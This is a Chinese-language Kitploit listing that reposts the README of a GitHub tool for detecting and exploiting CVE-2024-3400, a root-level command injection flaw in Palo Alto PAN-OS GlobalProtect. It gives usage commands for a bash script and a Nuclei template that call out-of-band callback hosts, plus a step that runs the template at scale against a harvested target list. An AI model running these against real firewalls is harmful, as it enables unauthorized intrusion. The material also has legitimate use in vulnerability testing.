Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-3400 — 用于检测和利用 Palo Alto PAN-OS GlobalProtect 中 CVE-2024-3400 命令注入漏洞的 Nuclei 模板和 bash 脚本,能够实现未经授权的 root 级别代码执行。 | Kitploit
工具/GitHubGitHub/schooldropout1337/cve-2024-3400
漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubschooldropout1337/cve-2024-3400

CVE-2024-3400

用于检测和利用 Palo Alto PAN-OS GlobalProtect 中 CVE-2024-3400 命令注入漏洞的 Nuclei 模板和 bash 脚本,能够实现未经授权的 root 级别代码执行。

查看仓库
6212年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-3400

POC

telemet

描述

由于 Palo Alto Networks PAN-OS 软件中 GlobalProtect 功能的任意文件创建漏洞导致的命令注入,影响了特定 PAN-OS 版本和特定功能配置,可能允许未经身份验证的攻击者以 root 权限在防火墙上执行任意代码。

Cloud NGFW、Panorama 设备和 Prisma Access 不受此漏洞影响。

用于 Palo Alto PAN-OS 漏洞的 CVE-2024-3400 Nuclei 模板

该仓库包含一个 Nuclei 模板,旨在检测与 Palo Alto PAN-OS 漏洞相关的问题,特别是针对 CVE-2024-3400。

综合研究列表由以下来源提供:

[1] https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis

[2] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

检测到的漏洞

  • 0 字节文件创建:该漏洞允许通过 Bash 文件中的 Curl 请求创建 0 字节文件。
  • 操作系统命令注入:Nuclei 模板可检测潜在的操作系统命令注入漏洞。

使用方法

Bash 脚本

执行以下命令运行 Bash 脚本:

root@kitploit:~
./CVE-2024-3400.sh http://target
或
sh CVE-2024-3400.sh http://target

脚本将检查文件是否被创建(返回 200 OK 状态)。如果成功,它将验证文件是否存在(返回 403 Forbidden 状态)。

Nuclei 模板 - telemet.yaml

  1. 启动 Interact 服务器:
root@kitploit:~
interactsh-client -v
  1. 运行 Nuclei 模板:
root@kitploit:~
nuclei -t ./CVE20243400.yaml -u http://target -V telemetry=xyz.oast.fun -debug
  1. Boom Boom 模板!(从 https://dig.pm 获取子域名)
root@kitploit:~
nuclei -t ./telemet.yaml -l pa-urls.txt -V telemetry=subdomain.ipv6.1433.eu.org

潜在目标

潜在目标列表可在 此处 找到。

root@kitploit:~
python fofax3r.py

作者

  • 作者:자전거, 自転車, 自行车

本 README.md 提供了有关漏洞、如何使用提供的脚本、潜在目标以及作者信息。如果您需要任何进一步调整,请告知!

下载工具